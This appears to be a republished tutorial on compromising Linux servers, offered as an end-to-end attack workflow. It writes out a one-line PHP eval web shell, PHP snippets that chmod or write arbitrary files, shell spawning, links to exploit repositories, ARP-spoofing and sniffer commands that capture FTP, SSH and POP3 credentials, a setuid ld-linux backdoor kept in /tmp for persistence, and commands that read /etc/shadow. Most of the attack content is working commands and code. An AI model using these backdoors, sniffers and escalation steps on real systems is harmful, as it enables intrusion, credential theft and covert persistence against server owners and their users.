How to Exploit Linux Servers: PHP Backdoors, Kernel Privilege Escalation, and Sniffing
This guide walks through creating a one‑line PHP backdoor, gaining interactive shells, escalating Linux privileges via kernel exploits and misconfigurations, compiling and using network sniffers, and harvesting credentials, all illustrated with concrete command‑line examples and code snippets.
First, create a one‑line PHP backdoor on the target server:
echo -e "<?php @eval($_POST[md5])?>" > rankuplog_time.phpVerify the file: cat rankuplog_time.php Attempt a simple cross‑site request by listing the web directory: ls -la /www.users/ Use Python to spawn an interactive shell when the system has Python installed: python -c 'import pty; pty.spawn("/bin/sh")' Check the current user ID and kernel version:
iduname -rTypical Linux privilege‑escalation vectors include third‑party software vulnerabilities, local trust features, and kernel overflows. Useful exploit repositories are:
http://tools.90sec.org/
http://sebug.net/paper/linux_exp/
http://x73.cc/bitch/exp/
http://www.exploit-db.com/search/
Compile and run arpsniffer after installing libpcap and libnet:
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnetRun the sniffer to spoof the gateway and capture traffic:
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110Capture the target’s packets with tcpdump and save them for analysis:
tcpdump -i eth0 host 192.168.0.11
tcpdump -i eth0 host 172.16.0.12 -w pop.txtModify linsniffer.c to monitor specific service ports (e.g., FTP, SSH, POP3) and compile:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh */
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
gcc -o linsniffer linsniffer.cRun the sniffer and find captured credentials in tcp.log: ./linsniffer Additional PHP backdoors for changing file permissions or writing arbitrary files:
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if($ok) echo "CHMOD OK, Permission editable file or directory.";
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen($_POST['filename'], 'a');
@fputs($fp, $mess);
@fclose($fp);Exploit a local kernel vulnerability (e.g., udp_sendmsg < 2.6.19) and use udev for privilege escalation. After gaining root, create a set‑uid backdoor:
cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven
./.str1ven `which whoami`Common enumeration commands demonstrated include:
cat /etc/passwd
cat /etc/shadow
ifconfig
netstat -an | grep LISTEN
service --status-all
lsb_release -a
These steps illustrate a full workflow from initial web‑shell insertion to privilege escalation, traffic interception, credential harvesting, and persistence on a compromised Linux host.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.